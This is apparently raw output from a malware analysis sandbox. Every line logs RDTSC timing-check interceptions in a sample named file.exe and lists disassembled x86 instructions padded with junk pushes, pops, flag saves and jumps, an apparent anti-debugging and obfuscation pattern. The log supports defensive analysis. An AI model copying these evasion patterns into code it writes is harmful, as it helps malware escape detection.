Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502074C second address: 50207EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ah, bh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F5E9072B8A4h 0x00000010 push eax 0x00000011 jmp 00007F5E9072B89Bh 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F5E9072B8A4h 0x0000001e jmp 00007F5E9072B8A5h 0x00000023 popfd 0x00000024 mov ebx, esi 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F5E9072B89Fh 0x00000032 and cl, FFFFFFBEh 0x00000035 jmp 00007F5E9072B8A9h 0x0000003a popfd 0x0000003b call 00007F5E9072B8A0h 0x00000040 pop ecx 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50207EB second address: 50207F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020697 second address: 50206AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E9072B8A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50206AF second address: 50206DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5E907EB785h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50206DA second address: 5020700 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E9072B89Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020700 second address: 502070A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4F68CF42h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502043A second address: 5020440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020440 second address: 5020446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020446 second address: 502044A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502044A second address: 50204F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5E907EB788h 0x0000000e push eax 0x0000000f jmp 00007F5E907EB77Bh 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov edi, ecx 0x00000018 pushfd 0x00000019 jmp 00007F5E907EB780h 0x0000001e and eax, 37998078h 0x00000024 jmp 00007F5E907EB77Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F5E907EB784h 0x00000034 sbb esi, 241E9AD8h 0x0000003a jmp 00007F5E907EB77Bh 0x0000003f popfd 0x00000040 pushad 0x00000041 mov edi, eax 0x00000043 pushfd 0x00000044 jmp 00007F5E907EB782h 0x00000049 or ah, 00000038h 0x0000004c jmp 00007F5E907EB77Bh 0x00000051 popfd 0x00000052 popad 0x00000053 popad 0x00000054 pop ebp 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 mov si, A881h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50301B1 second address: 50301F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5E9072B8A4h 0x00000011 or ax, 5188h 0x00000016 jmp 00007F5E9072B89Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50301F4 second address: 5030247 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5E907EB782h 0x00000008 sbb ax, 33E8h 0x0000000d jmp 00007F5E907EB77Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F5E907EB789h 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5E907EB77Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5030247 second address: 5030286 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F5E9072B89Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5E9072B8A7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5030286 second address: 503029E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E907EB784h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 503029E second address: 50302A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5060E6C second address: 5060E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5060E70 second address: 5060E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5060E76 second address: 5060EA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5E907EB780h 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov dx, 28B2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5060EA1 second address: 5060EE4 instructions: 0x00000000 rdtsc 0x00000002 mov ax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pop ebx 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F5E9072B8A9h 0x00000014 and ax, 9036h 0x00000019 jmp 00007F5E9072B8A1h 0x0000001e popfd 0x0000001f mov dx, si 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5060EE4 second address: 5060F06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E907EB77Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50405AD second address: 5040614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E876h 0x00000007 pushfd 0x00000008 jmp 00007F5E9072B8A7h 0x0000000d and eax, 3FA0A8FEh 0x00000013 jmp 00007F5E9072B8A9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F5E9072B89Ch 0x00000024 or si, F7F8h 0x00000029 jmp 00007F5E9072B89Bh 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 mov di, si 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5040614 second address: 5040623 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5040623 second address: 5040627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5040627 second address: 504062B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 504062B second address: 5040631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5040631 second address: 5040671 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB780h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5E907EB780h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5E907EB787h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5040671 second address: 5040677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5040677 second address: 504067B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 504067B second address: 50406C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b jmp 00007F5E9072B8A7h 0x00000010 and dword ptr [eax], 00000000h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushfd 0x00000019 jmp 00007F5E9072B8A1h 0x0000001e jmp 00007F5E9072B89Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50406C4 second address: 5040701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and dword ptr [eax+04h], 00000000h 0x0000000e jmp 00007F5E907EB787h 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5E907EB785h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50205F3 second address: 5020645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B89Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5E9072B8A6h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F5E9072B8A0h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5E9072B8A7h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020645 second address: 502064B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502064B second address: 502064F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50400C6 second address: 50400E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50400E3 second address: 50400E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50400E9 second address: 504010F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F5E907EB784h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 504010F second address: 5040113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5040113 second address: 5040117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5040117 second address: 504011D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 504011D second address: 5040123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5040123 second address: 504018E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B89Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushad 0x0000000f call 00007F5E9072B8A8h 0x00000014 pop eax 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007F5E9072B89Bh 0x0000001c jmp 00007F5E9072B8A3h 0x00000021 popfd 0x00000022 popad 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F5E9072B8A5h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5040366 second address: 504036A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 504036A second address: 5040370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5040370 second address: 50403D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, E4D3h 0x00000007 pushfd 0x00000008 jmp 00007F5E907EB788h 0x0000000d adc ch, 00000058h 0x00000010 jmp 00007F5E907EB77Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov cx, dx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007F5E907EB781h 0x00000026 or eax, 2AFD37F6h 0x0000002c jmp 00007F5E907EB781h 0x00000031 popfd 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50403D3 second address: 504044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F5E9072B89Ah 0x0000000f sub eax, 5FCD7118h 0x00000015 jmp 00007F5E9072B89Bh 0x0000001a popfd 0x0000001b mov esi, 407990CFh 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F5E9072B8A7h 0x0000002c or eax, 49D07A8Eh 0x00000032 jmp 00007F5E9072B8A9h 0x00000037 popfd 0x00000038 call 00007F5E9072B8A0h 0x0000003d pop esi 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 504044E second address: 504047C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB780h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E907EB787h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5060672 second address: 5060696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5060696 second address: 50606A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50607CA second address: 50607DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50607DF second address: 50607E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50607E5 second address: 50607E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50607E9 second address: 5060809 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB783h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5060809 second address: 5060824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5060824 second address: 5060858 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E907EB77Fh 0x00000009 and ax, D62Eh 0x0000000e jmp 00007F5E907EB789h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5060858 second address: 5060877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 ret 0x00000008 nop 0x00000009 push eax 0x0000000a call 00007F5E9486C02Fh 0x0000000f mov edi, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5E9072B8A3h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5060877 second address: 50608C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5E907EB77Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov dx, 38E4h 0x00000015 mov cx, di 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5E907EB781h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50608C3 second address: 50608C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50608C7 second address: 50608CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50608CD second address: 5060945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E9072B8A9h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F5E9072B8A3h 0x00000016 or cx, 61BEh 0x0000001b jmp 00007F5E9072B8A9h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F5E9072B8A0h 0x00000027 and cl, FFFFFFB8h 0x0000002a jmp 00007F5E9072B89Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010007 second address: 501000E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501000E second address: 5010057 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B89Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F5E9072B89Eh 0x00000010 pushfd 0x00000011 jmp 00007F5E9072B8A2h 0x00000016 sbb cl, FFFFFFB8h 0x00000019 jmp 00007F5E9072B89Bh 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010057 second address: 501005B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501005B second address: 501012D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5E9072B89Bh 0x00000008 and ch, 0000007Eh 0x0000000b jmp 00007F5E9072B8A9h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F5E9072B8A0h 0x00000019 and si, 5078h 0x0000001e jmp 00007F5E9072B89Bh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F5E9072B8A4h 0x0000002d xor ax, 6AD8h 0x00000032 jmp 00007F5E9072B89Bh 0x00000037 popfd 0x00000038 jmp 00007F5E9072B8A8h 0x0000003d popad 0x0000003e mov ebp, esp 0x00000040 jmp 00007F5E9072B8A0h 0x00000045 and esp, FFFFFFF8h 0x00000048 pushad 0x00000049 pushfd 0x0000004a jmp 00007F5E9072B89Eh 0x0000004f adc ax, AF98h 0x00000054 jmp 00007F5E9072B89Bh 0x00000059 popfd 0x0000005a mov ah, 51h 0x0000005c popad 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 movzx esi, bx 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501012D second address: 5010168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 68A06437h 0x00000008 push eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ecx 0x00000010 jmp 00007F5E907EB786h 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007F5E907EB77Dh 0x0000001e pop ecx 0x0000001f push edi 0x00000020 pop esi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010168 second address: 50101BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E9072B8A8h 0x00000008 pushfd 0x00000009 jmp 00007F5E9072B8A2h 0x0000000e jmp 00007F5E9072B8A5h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5E9072B89Ch 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50101BE second address: 50101DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 jmp 00007F5E907EB77Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50101DA second address: 50101E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50101E0 second address: 5010218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB782h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c jmp 00007F5E907EB780h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5E907EB77Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010218 second address: 501021E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501021E second address: 5010255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5E907EB77Bh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov ecx, 17D0726Bh 0x00000016 mov ebx, eax 0x00000018 popad 0x00000019 mov esi, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d mov dx, ax 0x00000020 popad 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010255 second address: 5010259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010259 second address: 501025F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 501025F second address: 5010275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 mov ebx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, bx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5010275 second address: 50102B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E907EB788h 0x00000009 sub ecx, 084251B8h 0x0000000f jmp 00007F5E907EB77Bh 0x00000014 popfd 0x00000015 mov ch, E5h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test esi, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
